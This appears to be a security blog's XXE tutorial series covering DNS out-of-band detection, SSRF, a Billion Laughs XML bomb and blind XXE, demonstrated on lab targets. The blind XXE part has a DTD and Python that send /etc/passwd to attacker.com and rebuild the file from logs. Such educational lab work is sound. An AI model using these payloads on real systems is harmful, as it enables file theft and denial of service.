Thursday, August 1, 2019

XML External Entities - DNS Resolution - Part VI

XXE Attack -


Hi guys!! This is the last part of the XXE series, and it covers DNS resolution through XML External Entities.

What is DNS Resolution?

Every host reachable on the Internet has an IP address, which is awkward for people to remember. DNS (Domain Name System) resolution is the process of translating a domain name into the IP address(es) it points to. This process is also known as a DNS lookup.
When you type in a web address, e.g., jagskap.blogspot.com, your machine asks a recursive resolver (usually the one provided by your Internet Service Provider) for the records associated with the domain name. The resolver returns a machine-friendly IP address (for example 216.58.196.193 for jagskap.blogspot.com) and your browser connects to it.
Note: DNS is hierarchical. If the recursive resolver does not have the answer cached, it asks the root servers, then the servers for the top-level domain (.com), then the authoritative servers for the domain itself, until it gets an answer or times out. Every lookup of a name you control therefore ends up at your own authoritative server, which is exactly what makes DNS usable as an out-of-band signal: the lookup is logged there whether or not the target later manages to connect to the resolved address.

DNS Resolution through XXE

The attack is set up exactly like Out of Band XXE: an external entity whose SYSTEM identifier points at a hostname the attacker controls. The difference is in what reaches the attacker. In the DNS resolution case the target's parser (or the operating system on its behalf) resolves the hostname, so the attacker's authoritative name server sees the lookup, but no HTTP GET/POST request ever arrives. This is typical when outbound HTTP from the server is blocked by egress filtering while DNS is still allowed, and it still proves that the parser processes external entities. Below is a practical demonstration for the same.

Demo

Again for the demonstration purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/.

Exhibit 1

Step 2: Intercept the request using a proxy tool like Burp Suite. Click on Burp → Burp Collaborator Client → Copy to Clipboard to obtain a unique Collaborator hostname, and use it as the SYSTEM identifier of an external entity in the XML request, as shown in Exhibit 2.


Exhibit 2

Bingo!! Exhibit 2 shows that Burp Collaborator receives a DNS lookup for the hostname from the target server, and only that: no HTTP request follows.


I hope you enjoyed the blog. Please share and comment.

XML External Entities - SSRF - Part V

XXE Attack -


Hi guys, I hope you have gone through the previous parts on XXE. This post talks about how SSRF (Server-Side Request Forgery) works through an XXE attack, along with a practical demonstration. Before we get into the attack, let us understand SSRF itself.

What is Server-Side Request Forgery (SSRF)?

Server-Side Request Forgery (SSRF) is a less widely understood attack, and its mechanics are often confused. An SSRF vulnerability lets an attacker make the back-end server of a vulnerable web application issue a request of the attacker's choosing, so the request originates from the server's network position rather than from the attacker's.


Let’s take a moment to understand where the vulnerability resides. It is common for a web application to fetch external resources as part of its normal functioning. For example, when this post is shared on Twitter, the Twitter server requests the page in order to extract the information it needs, such as the images and the description. The vulnerability lies in this kind of link expansion: if the server can be pointed at an arbitrary URL, it can be pointed at hosts the attacker cannot reach directly (Twitter's own link expansion was reported vulnerable to SSRF; see the Acunetix article in the References). SSRF attacks therefore target internal, protected systems that are not reachable from the external network, and also services on the victim server itself that listen only on the loopback interface (127.0.0.1).

Perform SSRF through XXE

The difference between Out of Band XXE and SSRF through XXE is what the attacker wants out of the request. In Out of Band XXE the request to the attacker's server carries the contents of a file; in SSRF through XXE the request itself is the goal. The attacker supplies an external entity whose SYSTEM identifier points at a host and port of their choosing, and the vulnerable server acts as a proxy to reach it. The attacker's own server only sees a plain GET with no file contents, but the same mechanism can be aimed at internal hosts, at loopback services, or, by repeating it, at a target as a Denial of Service amplifier. Below is a practical demonstration of the same.

Demo

For demo purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/ as shown in Exhibit 1.

Exhibit 1

Step 2: Intercept the request using a proxy tool like Burp Suite. Click on Burp → Burp Collaborator Client → Copy to Clipboard to obtain a unique Collaborator hostname, and use it as the SYSTEM identifier of an external entity in the XML request, as shown in Exhibit 2.

Exhibit 2

Exhibit 2 shows that Burp Collaborator receives an HTTP request from the target server: both the DNS lookup and the HTTP GET arrive, which is what distinguishes this from the DNS-only case covered in the next part.
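A small added example, not code from the original post or from Burp: give every XXE injection point its own hostname under a listener domain you control, then read the listener's log to tell which parameter fired and how far the target got, a full HTTP request (SSRF, this part) or only a DNS lookup (the next part). The listener domain oob.example, the parameter names and the log lines are constructed for the example, and the log format is this script's own, not Burp Collaborator's export format.

```python
"""Added example, not from the original post: give every XXE injection point
its own hostname under a listener domain you control, then read the
listener's log to see which parameter fired and how far the target got:
a full HTTP request (SSRF, this part) or only a DNS lookup (next part).
Assumed, not from the page: the listener domain oob.example, and the log
format below, which is this script's own and not Burp Collaborator's."""
import re
import secrets
from typing import Dict, Optional, Tuple

LISTENER_DOMAIN = "oob.example"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>dns|http)\s+(?P<host>\S+)", re.M)


def make_probe(param: str, token: Optional[str] = None,
               domain: str = LISTENER_DOMAIN) -> Tuple[str, str]:
    """Return (hostname, xml) for one injection point. The parameter name and
    a random token are labels of the hostname, so the listener log alone says
    which parameter triggered the callback."""
    token = token or secrets.token_hex(4)
    host = f"{token}.{param}.{domain}"
    xml = ('<?xml version="1.0"?>\n'
           f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "http://{host}/">]>\n'
           '<data>&xxe;</data>\n')
    return host, xml


def classify(log_text: str, probes: Dict[str, str]) -> Dict[str, str]:
    """Map each probed parameter to 'http' (the parser fetched the URL: SSRF),
    'dns' (the name was resolved but no HTTP request arrived: egress HTTP is
    probably filtered, or the parser resolved the name and then gave up) or
    'none' (no interaction at all)."""
    seen: Dict[str, set] = {}
    for m in LOG_RE.finditer(log_text):
        host = m.group("host").lower().rstrip(".")      # DNS names are case-insensitive
        seen.setdefault(host, set()).add(m.group("kind"))
    result = {}
    for param, host in probes.items():
        kinds = seen.get(host.lower(), set())
        result[param] = "http" if "http" in kinds else "dns" if "dns" in kinds else "none"
    return result


# Constructed listener log: one parameter fully fetched, one only resolved.
CONSTRUCTED_LOG = """\
2019-08-01T10:15:32Z dns  3f9a1c2e.email.oob.example
2019-08-01T10:15:32Z http 3f9a1c2e.email.oob.example GET /
2019-08-01T10:15:40Z dns  77b0d4e1.comment.oob.example
"""
PROBES = {
    "email": "3f9a1c2e.email.oob.example",
    "comment": "77b0d4e1.comment.oob.example",
    "name": "c0ffee00.name.oob.example",
}

if __name__ == "__main__":
    host, xml = make_probe("email")
    print(xml)
    for param, status in classify(CONSTRUCTED_LOG, PROBES).items():
        print(f"{param:8} -> {status}")
```

Run it and the constructed log yields email → http, comment → dns, name → none. A "dns" result is still a positive finding: the parser processed the external entity, it just could not (or did not) complete the fetch, which is exactly the situation Part VI demonstrates.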


I hope you enjoyed reading this. The next part is the last part, XML External Entities - DNS Resolution - Part VI. Please like, share and comment.

References

https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
https://www.winmill.com/News/Security-News/What-is-Server-Side-Request-Forgery-SSRF.aspx

XML External Entities - Billion Laughter Attack - Part IV

XXE Attack -


Hi Techmates, this blog is all about the famous Billion Laughs Attack. In this blog, we will discuss what this attack is and how it leads to a Denial of Service (DoS), with a practical demonstration.

What is Billion Laughter Attack?

The Billion Laughs Attack is a Denial of Service (DoS) attack that targets XML parsers; it is also known as an XML bomb. It uses only well-formed XML with internal entities, so it can pass XML schema validation and is not stopped by disabling external entities.


For Example:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>


In the above example there are five entities: lol, lol2, lol3, lol4 and lol5. The entity lol contains the string “lol”. The entity lol2 contains four references to lol, lol3 four references to lol2, and so on up to lol5. The document content references lol5 only once. When the parser expands lol5 it finds 4 references to lol4, each of which expands into 4 references to lol3, and so on, so the single &lol5; reference becomes 4^4 = 256 copies of “lol” (768 bytes). The growth is exponential in the depth: extend the pattern to ten entities with ten references each and the document expands to 10^9 copies of “lol”, about 3 GB of text from under a kilobyte of XML, hence the name. A parser that expands entities without a limit consumes that much memory and CPU, causing the DoS; the only real defence is a limit on entity expansion (or refusing DTDs altogether).
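An added example, not from the original post, that does the arithmetic above for you: it generates the lol payload for any depth and fan-out, computes the fully expanded size from the declarations without ever building the string, and uses that as a pre-parse gate. The regular expression only understands the flat internal subsets this attack uses (it is not a DTD parser), and MAX_EXPANSION is an assumed limit chosen for illustration.

```python
"""Added example, not from the original post: estimate how large a Billion
Laughs document becomes *before* handing it to a parser, and use that as a
pre-parse gate. The entity declarations are pulled out with a regular
expression that is good enough for the flat internal subsets this attack
uses; it is not a full DTD parser. MAX_EXPANSION is an assumed limit."""
import re
from typing import Dict

ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')  # general entities only
REF_RE = re.compile(r'&(\w+);')
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "quot": 1, "apos": 1}
MAX_EXPANSION = 10_000_000  # bytes; assumed for illustration


def lol_document(depth: int, fanout: int = 4) -> str:
    """Generate the classic payload: lol, lol2 ... lol<depth>, each entity
    holding `fanout` references to the previous one. depth=5, fanout=4
    reproduces the document shown in the post."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for n in range(2, depth + 1):
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{n} "{refs}">')
        prev = f"lol{n}"
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f"\n]>\n<lolz>&{prev};</lolz>\n")


def expansion_size(doc: str) -> int:
    """Bytes of text that expanding every entity reference in the document
    body would produce. Computed arithmetically from the declarations, so a
    10^9-copy bomb is sized in microseconds without building the string."""
    entities: Dict[str, str] = dict(ENTITY_RE.findall(doc))
    memo: Dict[str, int] = {}

    def size(name: str, stack: tuple = ()) -> int:
        if name in PREDEFINED:
            return PREDEFINED[name]
        if name in stack:
            raise ValueError(f"recursive entity {name}")   # forbidden by the XML spec
        if name not in entities:
            raise ValueError(f"undeclared entity {name}")
        if name not in memo:
            value = entities[name]
            literal = len(REF_RE.sub("", value))           # text that is not a reference
            memo[name] = literal + sum(size(ref, stack + (name,)) for ref in REF_RE.findall(value))
        return memo[name]

    body = doc[doc.index("]>") + 2:] if "]>" in doc else doc
    return sum(size(ref) for ref in REF_RE.findall(body))


def is_safe_to_parse(doc: str, limit: int = MAX_EXPANSION) -> bool:
    """Pre-parse gate. If the application never needs a DTD, the simpler and
    stronger policy is to reject any document containing '<!DOCTYPE' at all."""
    return expansion_size(doc) <= limit


if __name__ == "__main__":
    for depth, fanout in ((5, 4), (10, 10)):
        doc = lol_document(depth, fanout)
        print(f"depth={depth} fanout={fanout}: {len(doc)} bytes of XML expand to "
              f"{expansion_size(doc):,} bytes -> safe={is_safe_to_parse(doc)}")
```

The post's own document (depth 5, fan-out 4) sizes to 768 bytes and passes; the ten-by-ten variant sizes to 3,000,000,000 bytes and is rejected before any parser touches it. Recent libexpat builds (2.4 and later, and therefore current CPython) cap the amplification ratio themselves; a check like this is for parsers that do not, or for rejecting early, before anything is allocated.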

Demo

For demo purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/ and fill all the details as shown in Exhibit 1.

Exhibit 1

Step 2: Intercept the request using a proxy tool such as Burpsuite as shown in Exhibit 2.


Exhibit 2

Step 3: Enter the XML Code in the Burpsuite as shown in Exhibit 3. It can be observed that the application responds with “lollol……” as expected.


Exhibit 3

Step 4: Add more entity levels to the payload so that the expansion grows, turning it into a DoS attack, as shown in Exhibit 4.


Exhibit 4

Bingo!!! It can be observed that the application stops responding while the parser expands the entities.


I hope you guys liked this blog. If you have any queries please leave the comment below. Like and Share. Go through the XML External Entities - SSRF - Part V to know how you can perform SSRF through XXE.


References

https://www.thesecuritybuddy.com/dos-ddos-prevention/what-is-billion-laughs-attack/

XML External Entities - Out of band - Part III

XXE Attack -


Hi Techies!! In XML External Entities - Inband - Part II, we discussed the Inband XXE attack. In this part, we discuss the Out of Band XXE attack, along with an example that illustrates it in detail.

What is Out of Band?

Out of Band XXE (also called Blind XXE) covers the attacks in which the attacker does not see the parser's output in the application's response. The payload still relies on parameter entities, but it additionally requires an external DTD (Document Type Definition) hosted by the attacker. The major difference from Inband is that the attacker does not read the file from the response; instead, the target's XML parser is made to issue an additional request to the attacker's web server, with the contents of the local file embedded in the URL.


For example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://attacker.com/jagskap.dtd">
<data>&e1;</data>


jagskap.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker.com/jagskap?%p1;'>">
%p2;


The Out of Band XXE Attack is conducted as follows:
  • First, the XML parser makes a request to the attacker's DTD file at http://attacker.com/jagskap.dtd.
  • After jagskap.dtd is fetched, the parser processes the %p1; parameter entity, which loads the content of /etc/passwd into p1.
  • The %p2; parameter entity declares a general entity, &e1;, whose SYSTEM identifier is a URL that embeds the content of p1. The URL looks like http://attacker.com/jagskap?root:!:0:0::/:/usr/bin/sh...
  • Finally, when the parser reaches &e1; in the document body, it resolves that URL, which makes a request to the attacker's server.
  • The attacker logs the request on their end and reconstructs the file from the log entry.
Note: many parsers refuse to build a URL that contains newlines or other characters that are illegal in a URL, so a multi-line file such as /etc/passwd can fail at the last step with an error on the target. The usual workarounds are to exfiltrate over FTP instead of HTTP (the common choice against Java parsers) or, against PHP, to read the file through php://filter/convert.base64-encode/resource=/etc/passwd so that the URL only carries base64 characters.
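The five steps above, as an added example that is not code from the original post: it builds the two pieces of the payload (the XML sent to the target and the DTD the attacker hosts) and recovers the exfiltrated file from the attacker-side web server's access log, including the base64 variant used when the parser will not accept raw file content in a URL. Assumed, not from the page: attacker.com serves the DTD at /jagskap.dtd, callbacks go to /jagskap, and the log lines are constructed in Apache combined-log style.

```python
"""Added example, not from the original post: build the two pieces of the
Out of Band payload described above and recover the exfiltrated file from
the attacker-side web server's access log. Assumed, not from the page:
attacker.com hosts the DTD at /jagskap.dtd, callbacks go to /jagskap, and
the log lines are constructed in Apache combined-log style."""
import base64
import re
from urllib.parse import quote, unquote

ATTACKER = "http://attacker.com"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def build_payload(dtd_url: str = f"{ATTACKER}/jagskap.dtd") -> str:
    """The XML sent to the target. It carries no data of its own; it only
    points the parser at the attacker's DTD."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            f'<!DOCTYPE data SYSTEM "{dtd_url}">\n'
            '<data>&e1;</data>\n')


def build_dtd(resource: str = "file:///etc/passwd",
              callback: str = f"{ATTACKER}/jagskap") -> str:
    """The DTD hosted on the attacker's server. %p1; loads the resource;
    %p2; declares a general entity e1 whose SYSTEM identifier embeds that
    content in the query string, so resolving &e1; sends it to `callback`.
    A %p1; reference inside an entity value is legal here because this is
    an external DTD; inside an inline <!DOCTYPE [...]> internal subset it
    would have to be written as &#x25;p1; instead."""
    return (f'<!ENTITY % p1 SYSTEM "{resource}">\n'
            f'<!ENTITY % p2 "<!ENTITY e1 SYSTEM \'{callback}?%p1;\'>">\n'
            '%p2;\n')


def recover_from_log(log_line: str, base64_encoded: bool = False) -> str:
    """Pull the exfiltrated content out of one access-log line: everything
    after the first '?' of the request target, URL-decoded. If the target
    was asked for php://filter/convert.base64-encode/resource=<file>, the
    data is base64 as well, which sidesteps parsers that refuse to build a
    URL containing newlines."""
    m = REQUEST_RE.search(log_line)
    if not m:
        raise ValueError("no request line in log entry")
    _, _, query = m.group("target").partition("?")
    data = unquote(query)
    return base64.b64decode(data).decode() if base64_encoded else data


def simulate_callback(content: str, b64: bool = False) -> str:
    """Constructed helper: the log entry the attacker would see if the
    target's parser percent-encoded the data appended to the callback URL."""
    data = base64.b64encode(content.encode()).decode() if b64 else content
    return (f'192.168.56.102 - - [01/Aug/2019:10:15:33 +0000] '
            f'"GET /jagskap?{quote(data, safe="")} HTTP/1.1" 404 0 "-" "-"')


# Constructed log: the DTD fetch followed by the callback carrying two lines
# of /etc/passwd (newline encoded as %0A).
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/sh\nplay:x:1000:1000::/opt/play-2.1.3/xxe/:/bin/sh"
CONSTRUCTED_LOG = [
    '192.168.56.102 - - [01/Aug/2019:10:15:32 +0000] "GET /jagskap.dtd HTTP/1.1" 200 143 "-" "-"',
    '192.168.56.102 - - [01/Aug/2019:10:15:32 +0000] "GET /jagskap?root:x:0:0:root:/root:/bin/sh'
    '%0Aplay:x:1000:1000::/opt/play-2.1.3/xxe/:/bin/sh HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    print(build_payload())
    print(build_dtd())
    for line in CONSTRUCTED_LOG:
        data = recover_from_log(line)
        print("callback carried:", repr(data) if data else "(nothing: DTD fetch)")
```

The first log line is the DTD fetch and carries nothing; the second carries the file. Whether the target percent-encodes the appended data, sends it raw, or refuses to send it at all depends on the parser, which is why the base64 route (or FTP) is often needed in practice.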


DEMO


For the demo purpose, we will be using Pentesterlab ISO. You can download the ISO file from https://pentesterlab.com/exercises/play_xxe/iso.


Step 1: Boot the ISO in VirtualBox and check its IP address.
  • Target - 192.168.56.102
Step 2: From the attacker machine, navigate to http://192.168.56.102/login.


Exhibit 1

Step 3:  Intercept the request using a proxy tool like BurpSuite as shown in Exhibit 2.


Exhibit 2

Step 4: Let us check if the application is vulnerable to XXE injection. To do so, modify the request by changing the Content-Type to text/xml and adding XML data to the POST body, as shown in Exhibit 3.

Exhibit 3

It can be observed that the application server responds with Invalid XML, which tells us that the server parses XML. The only issue is that no parsed data is reflected back in the response, making this a blind attack. So even if we request the /etc/passwd file from the server, the server won't return it in the response. Thus we need another way, and here an external DTD plays an important role: we will use an external DTD to get the /etc/passwd file.

Step 5: Create a DTD file named “jagskap.dtd” with the content shown in Exhibit 4 and host it on the attacker’s web server (XAMPP or Apache).


Exhibit 4

Step 6:  Finally, we need to send the XML entity payload, as shown in Exhibit 5.


Exhibit 5

Step 7: When the request is processed, we can see that the target server makes a request to the attacker’s server as intended and dumps the /etc/passwd content into that request, as shown in Exhibit 6.


Exhibit 6

Step 8: Further, we can view other files and directories as well. Going back to the content of /etc/passwd, we can see that a play user exists. The home directory of this user is /opt/play-2.1.3/xxe/, as shown in Exhibit 7; there is a good chance that this is where the application is located.


Exhibit 7

Step 9: Depending on the XML parser, it is also possible to retrieve a directory listing: Java's file: URL handler returns the entries of a directory when the SYSTEM identifier points at one, whereas most other parsers simply fail, so the only way to know is to try. Here we modify the DTD file to point %p1; at /opt/play-2.1.3/xxe/ as shown in Exhibit 8.


Exhibit 8

Step 10: Let us send this request to the server as shown in Exhibit 9.


Exhibit 9

Step 11: Bingo!!!! The content of the directory is included in the request to the attacker's server, as shown in Exhibit 10.


Exhibit 10


I hope this blog helped you clear up the concept of Out of Band XXE. XML External Entities - Billion Laughter Attack - Part IV talks about how XXE can be used for a Denial of Service attack. Please like, share and comment.

References

https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/